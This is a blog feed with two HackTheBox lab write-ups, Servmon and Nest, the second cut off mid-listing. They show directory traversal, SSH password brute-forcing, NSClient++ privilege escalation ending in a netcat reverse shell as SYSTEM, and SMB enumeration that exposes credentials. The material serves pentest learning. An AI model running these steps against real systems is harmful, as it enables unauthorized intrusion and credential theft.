Matheus Bratfisch2020-08-24T19:08:14-05:00http://www.matbra.comMatheus Bratfischmatheusbrat@gmail.comHackthebox - Write up of Servmon machine2020-08-24T00:00:00-05:00http://www.matbra.com/2020/08/24/hackthebox-write-up-servmon-machine<p>This time, let’s try to get root on Servmon machine from Hackthebox.</p>
<p>Standard starting procedure: NMAP.</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$ </span>nmap <span class="nt">-T4</span> 10.10.10.184
Starting Nmap 7.80 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2020-04-29 20:10 EDT
Nmap scan report <span class="k">for </span>10.10.10.184 <span class="o">(</span>10.10.10.184<span class="o">)</span>
Host is up <span class="o">(</span>0.22s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 992 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5666/tcp open nrpe
6699/tcp open napster
Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>124.70 seconds</code></pre></figure>
<p>Opening website as that has given good results while nmap runs again with -A.</p>
<p>It seems there is a software called NVMS-1000 running there. Let’s google and see what that is about. On this search we can see it is vulnerable to a directory traversal. https://www.exploit-db.com/exploits/48311</p>
<p>Keep this in mind and let’s take a look on ftp.</p>
<!--more-->
<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$ </span>ftp 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name <span class="o">(</span>10.10.10.184:kali<span class="o">)</span>: anonymous
331 Anonymous access allowed, send identity <span class="o">(</span>e-mail name<span class="o">)</span> as password.
Password:
230 User logged <span class="k">in</span><span class="nb">.</span>
Remote system <span class="nb">type </span>is Windows_NT.
ftp> <span class="nb">dir
</span>200 PORT <span class="nb">command </span>successful.
125 Data connection already open<span class="p">;</span> Transfer starting.
01-18-20 12:05PM <DIR> Users
226 Transfer complete.
ftp> <span class="nb">cd </span>Users
250 CWD <span class="nb">command </span>successful.
ftp> <span class="nb">dir
</span>200 PORT <span class="nb">command </span>successful.
125 Data connection already open<span class="p">;</span> Transfer starting.
01-18-20 12:06PM <DIR> Nadine
01-18-20 12:08PM <DIR> Nathan
226 Transfer complete.
ftp> <span class="nb">cd </span>Nadine
250 CWD <span class="nb">command </span>successful.
ftp> <span class="nb">dir
</span>200 PORT <span class="nb">command </span>successful.
get 125 Data connection already open<span class="p">;</span> Transfer starting.
01-18-20 12:08PM 174 Confidential.txt
226 Transfer complete.
ftp> get Confidential.txt
<span class="nb">local</span>: Confidential.txt remote: Confidential.txt
200 PORT <span class="nb">command </span>successful.
125 Data connection already open<span class="p">;</span> Transfer starting.
226 Transfer complete.
174 bytes received <span class="k">in </span>1.04 secs <span class="o">(</span>0.1635 kB/s<span class="o">)</span>
ftp> <span class="nb">cd</span> ..
250 CWD <span class="nb">command </span>successful.
ftp> <span class="nb">cd </span>Nathan
<span class="nb">dir
</span>250 CWD <span class="nb">command </span>successful.
ftp> <span class="nb">dir
</span>200 PORT <span class="nb">command </span>successful.
150 Opening ASCII mode data connection.
01-18-20 12:10PM 186 Notes to <span class="k">do</span>.txt
226 Transfer complete.
ftp> get <span class="s1">'Notes to do.txt'</span>
<span class="nb">local</span>: to remote: <span class="s1">'Notes
200 PORT command successful.
550 The system cannot find the file specified.
ftp> get "Notes to do.txt"
local: Notes to do.txt remote: Notes to do.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
186 bytes received in 1.02 secs (0.1778 kB/s)
ftp> </span></code></pre></figure>
<p>Checking file content:</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$ </span><span class="nb">cat </span>Notes<span class="se">\ </span>to<span class="se">\ </span><span class="k">do</span>.txt
1<span class="o">)</span> Change the password <span class="k">for </span>NVMS - Complete
2<span class="o">)</span> Lock down the NSClient Access - Complete
3<span class="o">)</span> Upload the passwords
4<span class="o">)</span> Remove public access to NVMS
5<span class="o">)</span> Place the secret files <span class="k">in </span>SharePoint
<span class="nv">$ </span><span class="nb">cat </span>Confidential.txt
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Nadine</code></pre></figure>
<p>OK. This sounds promising if we connect the traversal with this Password path hint we might be able to access the files. Lets use msfconsole</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash">msf5 auxiliary<span class="o">(</span>scanner/http/tvt_nvms_traversal<span class="o">)</span> <span class="o">></span> search nvms
Matching Modules
<span class="o">================</span>
<span class="c"># Name Disclosure Date Rank Check Description</span>
- <span class="nt">----</span> <span class="nt">---------------</span> <span class="nt">----</span> <span class="nt">-----</span> <span class="nt">-----------</span>
0 auxiliary/scanner/http/tvt_nvms_traversal 2019-12-12 normal No TVT NVMS-1000 Directory Traversal
msf5 auxiliary<span class="o">(</span>scanner/http/tvt_nvms_traversal<span class="o">)</span> <span class="o">></span> use 0
msf5 auxiliary<span class="o">(</span>scanner/http/tvt_nvms_traversal<span class="o">)</span> <span class="o">></span> <span class="nb">set </span>rhosts 10.10.10.184
rhosts <span class="o">=></span> 10.10.10.184
msf5 auxiliary<span class="o">(</span>scanner/http/tvt_nvms_traversal<span class="o">)</span> <span class="o">></span> <span class="nb">set </span>FILEPATH /Users/Nathan/Desktop/Passwords.txt
FILEPATH <span class="o">=></span> /Users/Nathan/Desktop/Passwords.txt
msf5 auxiliary<span class="o">(</span>scanner/http/tvt_nvms_traversal<span class="o">)</span> <span class="o">></span> run
<span class="o">[</span>+] 10.10.10.184:80 - Downloaded 156 bytes
<span class="o">[</span>+] File saved <span class="k">in</span>: /home/kali/.msf4/loot/20200519201005_default_10.10.10.184_nvms.traversal_218286.txt
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Scanned 1 of 1 hosts <span class="o">(</span>100% <span class="nb">complete</span><span class="o">)</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Auxiliary module execution completed
msf5 auxiliary<span class="o">(</span>scanner/http/tvt_nvms_traversal<span class="o">)</span> <span class="o">></span> </code></pre></figure>
<p>Checking the file content:</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$ </span><span class="nb">cat</span> /home/kali/.msf4/loot/20200519201005_default_10.10.10.184_nvms.traversal_218286.txt
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5<span class="err">$</span></code></pre></figure>
<p>That’s a possible list of passwords I believe. We have two possible users:</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash">nadine
nathan</code></pre></figure>
<p>With this password list, so we can use msfconsole with ssh_login to try them:</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash">msf5 <span class="o">></span> search ssh_login
Matching Modules
<span class="o">================</span>
<span class="c"># Name Disclosure Date Rank Check Description</span>
- <span class="nt">----</span> <span class="nt">---------------</span> <span class="nt">----</span> <span class="nt">-----</span> <span class="nt">-----------</span>
0 auxiliary/scanner/ssh/ssh_login normal No SSH Login Check Scanner
1 auxiliary/scanner/ssh/ssh_login_pubkey normal No SSH Public Key Login Scanner
msf5 <span class="o">></span> use 0
msf5 auxiliary<span class="o">(</span>scanner/ssh/ssh_login<span class="o">)</span> <span class="o">></span> options
Module options <span class="o">(</span>auxiliary/scanner/ssh/ssh_login<span class="o">)</span>:
Name Current Setting Required Description
<span class="nt">----</span> <span class="nt">---------------</span> <span class="nt">--------</span> <span class="nt">-----------</span>
BLANK_PASSWORDS <span class="nb">false </span>no Try blank passwords <span class="k">for </span>all <span class="nb">users
</span>BRUTEFORCE_SPEED 5 <span class="nb">yes </span>How fast to bruteforce, from 0 to 5
DB_ALL_CREDS <span class="nb">false </span>no Try each user/password couple stored <span class="k">in </span>the current database
DB_ALL_PASS <span class="nb">false </span>no Add all passwords <span class="k">in </span>the current database to the list
DB_ALL_USERS <span class="nb">false </span>no Add all <span class="nb">users </span><span class="k">in </span>the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS <span class="nb">yes </span>The target host<span class="o">(</span>s<span class="o">)</span>, range CIDR identifier, or hosts file with syntax <span class="s1">'file:<path>'</span>
RPORT 22 <span class="nb">yes </span>The target port
STOP_ON_SUCCESS <span class="nb">false yes </span>Stop guessing when a credential works <span class="k">for </span>a host
THREADS 1 <span class="nb">yes </span>The number of concurrent threads <span class="o">(</span>max one per host<span class="o">)</span>
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing <span class="nb">users </span>and passwords separated by space, one pair per line
USER_AS_PASS <span class="nb">false </span>no Try the username as the password <span class="k">for </span>all <span class="nb">users
</span>USER_FILE no File containing usernames, one per line
VERBOSE <span class="nb">false yes </span>Whether to print output <span class="k">for </span>all attempts
msf5 auxiliary<span class="o">(</span>scanner/ssh/ssh_login<span class="o">)</span> <span class="o">></span> <span class="nb">set </span>rhosts 10.10.10.184
rhosts <span class="o">=></span> 10.10.10.184
msf5 auxiliary<span class="o">(</span>scanner/ssh/ssh_login<span class="o">)</span> <span class="o">></span> <span class="nb">set </span>user_file users.txt
user_file <span class="o">=></span> users.txt
msf5 auxiliary<span class="o">(</span>scanner/ssh/ssh_login<span class="o">)</span> <span class="o">></span> <span class="nb">set </span>pass_file passwords.txt
pass_file <span class="o">=></span> passwords.txt
msf5 auxiliary<span class="o">(</span>scanner/ssh/ssh_login<span class="o">)</span> <span class="o">></span> run
<span class="o">[</span>+] 10.10.10.184:22 - Success: <span class="s1">'nadine:L1k3B1gBut7s@W0rk'</span> <span class="s1">''</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Command shell session 1 opened <span class="o">(</span>10.10.16.87:44279 -> 10.10.10.184:22<span class="o">)</span> at 2020-05-19 20:14:31 <span class="nt">-0400</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Scanned 1 of 1 hosts <span class="o">(</span>100% <span class="nb">complete</span><span class="o">)</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Auxiliary module execution completed
msf5 auxiliary<span class="o">(</span>scanner/ssh/ssh_login<span class="o">)</span> <span class="o">></span> </code></pre></figure>
<p>It found a valid credential. Perfect, lets access it on ssh. Keep in mind to always do some enumeration and look what exists on machine and what config it does have. If a service doesnt sound promising, check google and config. With this approach we can find
C:\Program Files\NSClient++\nsclient.ini</p>
<p>It has an interesting part</p>
<figure class="highlight"><pre><code class="language-ini" data-lang="ini"><span class="c">; Undocumented key
</span><span class="py">password</span> <span class="p">=</span> <span class="s">ew2x6SsGTxjRwXOT</span>
<span class="c">; Undocumented key
</span><span class="err">allowed</span> <span class="py">hosts</span> <span class="p">=</span> <span class="s">127.0.0.1</span>
<span class="c">; Undocumented key
</span><span class="py">WEBServer</span> <span class="p">=</span> <span class="s">enabled</span></code></pre></figure>
<p>After some more googling we can find out that WEBServer for NSClient by default listen on port 8443 so creating a tunnel which allow our localhost to access the other machine ip on that port with:</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$ </span>ssh <span class="nt">-L</span> 8443:127.0.0.1:8443 nadine@10.10.10.184</code></pre></figure>
<p>And open the website on my chrome instance. We can also see there is a Priv Esc for NSClient++ on https://www.exploit-db.com/exploits/46802
Usually this machines doesn’t need reboot but let’s try to follow the process more or less. It seems the machine is not that stable but after a few tries I was able to connect to 8443 and login.</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash">Add script foobar to call evil.bat and save settings
- Settings <span class="o">></span> External Scripts <span class="o">></span> Scripts
- Add New
- section: /settings/external scripts/scripts/foobar
- key: <span class="nb">command</span>
- value: c:<span class="se">\t</span>emp<span class="se">\e</span>vil.bat
Add schedulede to call script every 1 minute and save settings
- Settings <span class="o">></span> Scheduler <span class="o">></span> Schedules
- Add new
- section: /settings/scheduler/schedules/foobar
- key: interval
- value: 1m
- key: <span class="nb">command</span>
- value: foobar</code></pre></figure>
<p>This was a bit painful to run, it didn’ t start automatically but when I opened: Console I saw a bunch of messages like:</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash">Unknown <span class="nb">command</span><span class="o">(</span>s<span class="o">)</span>: foobar available commands: commands <span class="o">{</span>, alias_cpu, alias_cpu_ex, alias_disk, alias_disk_loose, alias_event_log, alias_file_age, alias_file_size, alias_mem, alias_process, alias_process_count, alias_process_hung, alias_process_stopped, alias_sched_all, alias_sched_long, alias_sched_task, alias_service, alias_service_ex, alias_up, alias_volumes, alias_volumes_loose, check_tasksched, checktasksched, foobar<span class="o">}</span>, plugins <span class="o">{</span>, 0, 1<span class="o">}</span></code></pre></figure>
<p>so I tried to call foobar directly and… I got a root shell on nc</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$ </span><span class="nb">sudo </span>nc <span class="nt">-nlvvp</span> 2443
<span class="o">[</span><span class="nb">sudo</span><span class="o">]</span> password <span class="k">for </span>kali:
listening on <span class="o">[</span>any] 2443 ...
<span class="nb">whoami
</span>connect to <span class="o">[</span>10.10.16.87] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.184] 50557
Microsoft Windows <span class="o">[</span>Version 10.0.18363.752]
<span class="o">(</span>c<span class="o">)</span> 2019 Microsoft Corporation. All rights reserved.
C:<span class="se">\P</span>rogram Files<span class="se">\N</span>SClient++>whoami
nt authority<span class="se">\s</span>ystem</code></pre></figure>
<p>Hope you had fun,
Matheus</p>
Hackthebox - Write up of Nest machine2020-06-19T00:00:00-05:00http://www.matbra.com/2020/06/19/hackthebox-write-up-nest-machine<p>Hello,</p>
<p>As you guys already know I have been studying pentest. Recently I signed up on hackthebox.eu and started doing some easy machines.
This writeup will show the steps I have done to get user and root flag.</p>
<p>I always start with nmap.</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$ </span>nmap <span class="nt">-T4</span> <span class="nt">-Pn</span> <span class="nt">-p-</span> <span class="nt">-v</span> 10.10.10.178
Starting Nmap 7.80 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2020-06-01 21:41 EDT
Initiating Parallel DNS resolution of 1 host. at 21:41
Completed Parallel DNS resolution of 1 host. at 21:41, 0.01s elapsed
Initiating Connect Scan at 21:41
Scanning 10.10.10.178 <span class="o">(</span>10.10.10.178<span class="o">)</span> <span class="o">[</span>65535 ports]
Discovered open port 445/tcp on 10.10.10.178
Connect Scan Timing: About 3.75% <span class="k">done</span><span class="p">;</span> ETC: 21:55 <span class="o">(</span>0:13:16 remaining<span class="o">)</span>
Connect Scan Timing: About 16.48% <span class="k">done</span><span class="p">;</span> ETC: 21:47 <span class="o">(</span>0:05:09 remaining<span class="o">)</span>
Connect Scan Timing: About 39.14% <span class="k">done</span><span class="p">;</span> ETC: 21:45 <span class="o">(</span>0:02:21 remaining<span class="o">)</span>
Connect Scan Timing: About 66.62% <span class="k">done</span><span class="p">;</span> ETC: 21:44 <span class="o">(</span>0:01:01 remaining<span class="o">)</span>
Discovered open port 4386/tcp on 10.10.10.178
Completed Connect Scan at 21:44, 220.62s elapsed <span class="o">(</span>65535 total ports<span class="o">)</span>
Nmap scan report <span class="k">for </span>10.10.10.178 <span class="o">(</span>10.10.10.178<span class="o">)</span>
Host is up <span class="o">(</span>0.15s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 65533 filtered ports
PORT STATE SERVICE
445/tcp open microsoft-ds
4386/tcp open unknown
Read data files from: /usr/bin/../share/nmap
Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>220.71 seconds</code></pre></figure>
<p>Port 4386 seems different, will try some telnet to it, and enumerate:</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$ </span>telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is <span class="s1">'^]'</span><span class="nb">.</span>
HQK Reporting Service V1.2
<span class="o">></span><span class="nb">help
</span>This service allows <span class="nb">users </span>to run queries against databases using the legacy HQK format
<span class="nt">---</span> AVAILABLE COMMANDS <span class="nt">---</span>
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
<span class="o">></span>debug 1
Invalid password entered
<span class="o">></span>list
Use the query ID numbers below with the RUNQUERY <span class="nb">command </span>and the directory names with the SETDIR <span class="nb">command
</span>QUERY FILES IN CURRENT DIRECTORY
<span class="o">[</span>DIR] COMPARISONS
<span class="o">[</span>1] Invoices <span class="o">(</span>Ordered By Customer<span class="o">)</span>
<span class="o">[</span>2] Products Sold <span class="o">(</span>Ordered By Customer<span class="o">)</span>
<span class="o">[</span>3] Products Sold In Last 30 Days
Current Directory: ALL QUERIES
<span class="o">></span>setdir C:<span class="se">\W</span>indows<span class="se">\T</span>emp
Error: Access to the path <span class="s1">'C:\Windows\Temp\'</span> is denied.
<span class="o">></span></code></pre></figure>
<!--more-->
<p>Now let’s see what samba hides:</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$ </span>smbclient <span class="nt">-L</span> <span class="se">\\\\</span>10.10.10.178<span class="se">\\</span>
directory_create_or_exist: <span class="nb">mkdir </span>failed on directory /run/samba/msg.lock: Permission denied
Unable to initialize messaging context
Enter WORKGROUP<span class="se">\k</span>ali<span class="s1">'s password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Data Disk
IPC$ IPC Remote IPC
Secure$ Disk
Users Disk
SMB1 disabled -- no workgroup available</span></code></pre></figure>
<p>Listing everything with smbmap:</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$ </span>smbmap <span class="nt">-H</span> 10.10.10.178 <span class="nt">-R</span> <span class="nt">--depth</span> 10 <span class="nt">-p</span> a
<span class="o">[</span>+] Finding open SMB ports....
<span class="o">[</span>+] Guest SMB session established on 10.10.10.178...
<span class="o">[</span>+] IP: 10.10.10.178:445 Name: 10.10.10.178
Disk Permissions Comment
<span class="nt">----</span> <span class="nt">-----------</span> <span class="nt">-------</span>
ADMIN<span class="nv">$ </span> NO ACCESS Remote Admin
C<span class="nv">$ </span> NO ACCESS Default share
<span class="nb">.</span>
dr--r--r-- 0 Wed Aug 7 18:53:46 2019 <span class="nb">.</span>
dr--r--r-- 0 Wed Aug 7 18:53:46 2019 ..
dr--r--r-- 0 Wed Aug 7 18:58:07 2019 IT
dr--r--r-- 0 Mon Aug 5 17:53:41 2019 Production
dr--r--r-- 0 Mon Aug 5 17:53:50 2019 Reports
dr--r--r-- 0 Wed Aug 7 15:07:51 2019 Shared
Data READ ONLY
.<span class="se">\</span>
dr--r--r-- 0 Wed Aug 7 18:53:46 2019 <span class="nb">.</span>
dr--r--r-- 0 Wed Aug 7 18:53:46 2019 ..
dr--r--r-- 0 Wed Aug 7 18:58:07 2019 IT
dr--r--r-- 0 Mon Aug 5 17:53:41 2019 Production
dr--r--r-- 0 Mon Aug 5 17:53:50 2019 Reports
dr--r--r-- 0 Wed Aug 7 15:07:51 2019 Shared
.<span class="se">\S</span>hared<span class="se">\</span>
dr--r--r-- 0 Wed Aug 7 15:07:51 2019 <span class="nb">.</span>
dr--r--r-- 0 Wed Aug 7 15:07:51 2019 ..
dr--r--r-- 0 Wed Aug 7 15:07:33 2019 Maintenance
dr--r--r-- 0 Wed Aug 7 15:08:07 2019 Templates
.<span class="se">\S</span>hared<span class="se">\M</span>aintenance<span class="se">\</span>
dr--r--r-- 0 Wed Aug 7 15:07:33 2019 <span class="nb">.</span>
dr--r--r-- 0 Wed Aug 7 15:07:33 2019 ..
<span class="nt">-r--r--r--</span> 48 Wed Aug 7 15:07:32 2019 Maintenance Alerts.txt
.<span class="se">\S</span>hared<span class="se">\T</span>emplates<span class="se">\</span>
dr--r--r-- 0 Wed Aug 7 15:08:07 2019 <span class="nb">.</span>
dr--r--r-- 0 Wed Aug 7 15:08:07 2019 ..
dr--r--r-- 0 Wed Aug 7 15:08:10 2019 HR
dr--r--r-- 0 Wed Aug 7 15:08:07 2019 Marketing
.<span class="se">\S</span>hared<span class="se">\T</span>emplates<span class="se">\H</span>R<span class="se">\</span>
dr--r--r-- 0 Wed Aug 7 15:08:10 2019 <span class="nb">.</span>
dr--r--r-- 0 Wed Aug 7 15:08:10 2019 ..
<span class="nt">-r--r--r--</span> 425 Wed Aug 7 18:55:36 2019 Welcome Email.txt
IPC<span class="nv">$ </span> NO ACCESS Remote IPC
Secure<span class="nv">$ </span> NO ACCESS
<span class="nb">.</span>
dr--r--r-- 0 Sat Jan 25 18:04:21 2020 <span class="nb">.</span>
dr--r--r-- 0 Sat Jan 25 18:04:21 2020 ..
dr--r--r-- 0 Fri Aug 9 11:08:23 2019 Administrator
dr--r--r-- 0 Sun Jan 26 02:21:44 2020 C.Smith
dr--r--r-- 0 Thu Aug 8 13:03:29 2019 L.Frost
dr--r--r-- 0 Thu Aug 8 13:02:56 2019 R.Thompson
dr--r--r-- 0 Wed Aug 7 18:56:02 2019 TempUser
Users READ ONLY
.<span class="se">\</span>
dr--r--r-- 0 Sat Jan 25 18:04:21 2020 <span class="nb">.</span>
dr--r--r-- 0 Sat Jan 25 18:04:21 2020 ..
dr--r--r-- 0 Fri Aug 9 11:08:23 2019 Administrator
dr--r--r-- 0 Sun Jan 26 02:21:44 2020 C.Smith
dr--r--r-- 0 Thu Aug 8 13:03:29 2019 L.Frost
dr--r--r-- 0 Thu Aug 8 13:02:56 2019 R.Thompson
dr--r--r-- 0 Wed Aug 7 18:56:02 2019 TempUser</code></pre></figure>
<p>Download the files we saw:</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$ </span>smbget <span class="nt">-R</span> smb://10.10.10.178/Data/Shared
Password <span class="k">for</span> <span class="o">[</span>kali] connecting to //Data/10.10.10.178:
Using workgroup WORKGROUP, user kali
smb://10.10.10.178/Data/Shared/Maintenance/Maintenance Alerts.txt
smb://10.10.10.178/Data/Shared/Templates/HR/Welcome Email.txt
Downloaded 473b <span class="k">in </span>11 seconds</code></pre></figure>
<p>Perfect we have something there checking what is inside the file:</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$ </span><span class="nb">cat </span>Templates/HR/Welcome<span class="se">\ </span>Email.txt
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>
You will find your home folder <span class="k">in </span>the following location:
<span class="se">\\</span>HTB-NEST<span class="se">\U</span>sers<span class="se">\<</span>USERNAME>
If you have any issues accessing specific services or workstations, please inform the
IT department and use the credentials below <span class="k">until </span>all systems have been <span class="nb">set </span>up <span class="k">for </span>you.
Username: TempUser
Password: welcome2019
Thank you
HR
kali@kali:~/sharedcat Maintenance/Maintenance<span class="se">\ </span>Alerts.txt
There is currently no scheduled maintenance work</code></pre></figure>
<p>Trying to list everything with this new user and credentials:</p>
<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$ </span>smbmap <span class="nt">-H</span> 10.10.10.178 <span class="nt">-R</span> <span class="nt">--depth</span> 10 <span class="nt">-u</span> TempUser <span class="nt">-p</span> welcome2019
<span class="o">[</span>+] Finding open SMB ports....
<span class="o">[</span>+] User SMB session established on 10.10.10.178...
<span class="o">[</span>+] IP: 10.10.10.178:445 Name: 10.10.10.178
Disk Permissions Comment
<span class="nt">----</span> <span class="nt">-----------</span> <span class="nt">-------</span>
ADMIN<span class="nv">$ </span> NO ACCESS Remote Admin
C<span class="nv">$ </span> NO ACCESS Default share
<span class="nb">.</span>
dr--r--r-- 0 Wed Aug 7 18:53:46 2019 <span class="nb">.</span>
dr--r--r-- 0 Wed Aug 7 18:53:46 2019 ..
dr--r--r-- 0 Wed Aug 7 18:58:07 2019 IT
dr--r--r-- 0 Mon Aug 5 17:53:41 2019 Production
dr--r--r-- 0 Mon Aug 5 17:53:50 2019 Reports
dr--r--r-- 0 Wed Aug 7 15:07:51 2019 Shared
Data READ ONLY
.<span class="se">\</span>
dr--r--r-- 0 Wed Aug 7 18:53:46 2019 <span class="nb">.</span>
dr--r--r-- 0 Wed Aug 7 18:53:46 2019 ..
dr--r--r-- 0 Wed Aug 7 18:58:07 2019 IT
dr--r--r-- 0 Mon Aug 5 17:53:41 2019 Production
dr--r--r-- 0 Mon Aug 5 17:53:50 2019 Reports
dr--r--r-- 0 Wed Aug 7 15:07:51 2019 Shared
.<span class="se">\I</span>T<span class="se">\</span>
dr--r--r-- 0 Wed Aug 7 18:58:07 2019 <span class="nb">.</span>
dr--r--r-- 0 Wed Aug 7 18:58:07 2019 ..
dr--r--r-- 0 Wed Aug 7 18:58:07 2019 Archive
dr--r--r-- 0 Wed Aug 7 18:59:34 2019 Configs
dr--r--r-- 0 Wed Aug 7 18:08:30 2019 Installs
dr--r--r-- 0 Sat Jan 25 19:09:13 2020 Reports
dr--r--r-- 0 Mon Aug 5 18:33:51 2019 Tools
.<span class="se">\I</span>T<span class="se">\C</span>onfigs<span class="se">\</span>
dr--r--r-- 0 Wed Aug 7 18:59:34 2019 <span class="nb">.</span>
dr--r--r-- 0 Wed Aug 7 18:59:34 2019 ..
dr--r--r-- 0 Wed Aug 7 15:20:13 2019 Adobe
dr--r--r-- 0 Tue Aug 6 07:16:34 2019 Atlas
dr--r--r-- 0 Tue Aug 6 09:27:08 2019 DLink
dr--r--r-- 0 Wed Aug 7 15:23:26 2019 Microsoft
dr--r--r-- 0 Wed Aug 7 15:33:54 2019 NotepadPlusPlus
dr--r--r-- 0 Wed Aug 7 16:01:13 2019 RU Scanner
dr--r--r-- 0 Tue Aug 6 09:27:09 2019 Server Manager
.<span class="se">\I</span>T<span class="se">\C</span>onfigs<span class="se">\A</span>dobe<span class="se">\</span>
dr--r--r-- 0 Wed Aug 7 15:20:13 2019 <span class="nb">.</span>
dr--r--r-- 0 Wed Aug 7 15:20:13 2019 ..
<span class="nt">-r--r--r--</span> 246 Wed Aug 7 15:20:13 2019 editing.xml
<span class="nt">-r--r--r--</span> 0 Wed Aug 7 15:20:09 2019 Options.txt
<span class="nt">-r--r--r--</span> 258 Wed Aug 7 15:20:09 2019 projects.xml
<span class="nt">-r--r--r--</span> 1274 Wed Aug 7 15:20:09 2019 settings.xml
.<span class="se">\I</span>T<span class="se">\C</span>onfigs<span class="se">\A</span>tlas<span class="se">\</span>
dr--r--r-- 0 Tue Aug 6 07:16:34 2019 <span class="nb">.</span>
dr--r--r-- 0 Tue Aug 6 07:16:34 2019 ..
<span class="nt">-r--r--r--</span> 1369 Tue Aug 6 07:18:38 2019 Temp.XML
.<span class="se">\I</span>T<span class="se">\C</span>onfigs<span class="se">\M</span>icrosoft<span class="se">\</span>
dr--r--r-- 0 Wed Aug 7 15:23:26 2019 <span class="nb">.</span>
dr--r--r-- 0 Wed Aug 7 15:23:26 2019 ..
<span class="nt">-r--r--r--</span> 4598 Wed Aug 7 15:23:26 2019 Options.xml
.<span class="se">\I</span>T<span class="se">\C</span>onfigs<span class="se">\N</span>otepadPlusPlus<span class="se">\</span>
dr--r--r-- 0 Wed Aug 7 15:33:54 2019 <span class="nb">.</span>
dr--r--r-- 0 Wed Aug 7 15:33:54 2019 ..
<span class="nt">-r--r--r--</span> 6451 Wed Aug 7 19:01:25 2019 config.xml
<span class="nt">-r--r--r--</span> 2108 Wed Aug 7 19:00:36 2019 shortcuts.xml
.<span class="se">\I</span>T<span class="se">\C</span>onfigs<span class="se">\R</span>U Scanner<span class="se">\</span>
dr--r--r-- 0 Wed Aug 7 16:01:13 2019 <span class="nb">.</span>
dr--r--r-- 0 Wed Aug 7 16:01:13 2019 ..
<span class="nt">-r--r--r--</span> 270 Thu Aug 8 15:49:37 2019 RU_config.xml
.<span class="se">\S</span>hared<span class="se">\</span>
dr--r--r-- 0 Wed Aug 7 15:07:51 2019 <span class="nb">.</span>
dr--r--r-- 0 Wed Aug 7 15:07:51 2019 ..
dr--r--r-- 0 Wed Aug 7 15:07:33 2019 Maintenance
dr--r--r-- 0 Wed Aug 7 15:08:07 2019 Templates
.<span class="se">\S</span>hared<span class="se">\M</span>aintenance<span class="se">\</span>
dr--r--r-- 0 Wed Aug 7 15:07:33 2019 <span class="nb">.</span>
dr--r--r-- 0 Wed Aug 7 15:07:33 2019 ..
<span class="nt">-r--r--r--</span> 48 Wed Aug 7 15:07:32 2019 Maintenance Alerts.txt
.<span class="se">\S</span>hared<span class="se">\T</span>emplates<span class="se">\</span>
dr--r--r-- 0 Wed Aug 7 15:08:07 2019 <span class="nb">.</span>
dr--r--r-- 0 Wed Aug 7 15:08:07 2019 ..
dr--r--r-- 0 Wed Aug 7 15:08:10 2019 HR
dr--r--r-- 0 Wed Aug 7 15:08:07 2019 Marketing
.<span class="se">\S</span>hared<span class="se">\T</span>emplates<span class="se">\H</span>R<span class="se">\</span>
dr--r--r-- 0 Wed Aug 7 15:08:10 2019 <span class="nb">.</span>
dr--r--r-- 0 Wed Aug 7 15:08:10 2019 ..
<span class="nt">-r--r--r--</span> 425 Wed Aug 7 18:55:36 2019 Welcome Email.txt
IPC<span class="nv">$ </span> NO ACCESS Remote IPC
<span class="nb">.</span>
dr--r--r-- 0 Wed Aug 7 19:08:12 2019 <span class="nb">.</span>
dr--r--r-- 0 Wed Aug 7 19:08:12 2019 ..
dr--r--r-- 0 Wed Aug 7 15:40:25 2019 Finance
dr--r--r-- 0 Wed Aug 7 19:08:12 2019 HR
dr--r--r-- 0 Thu Aug 8 06:59:25 2019 IT
Secure<span class="nv">$ </span> READ ONLY
.<span class="se">\</span>
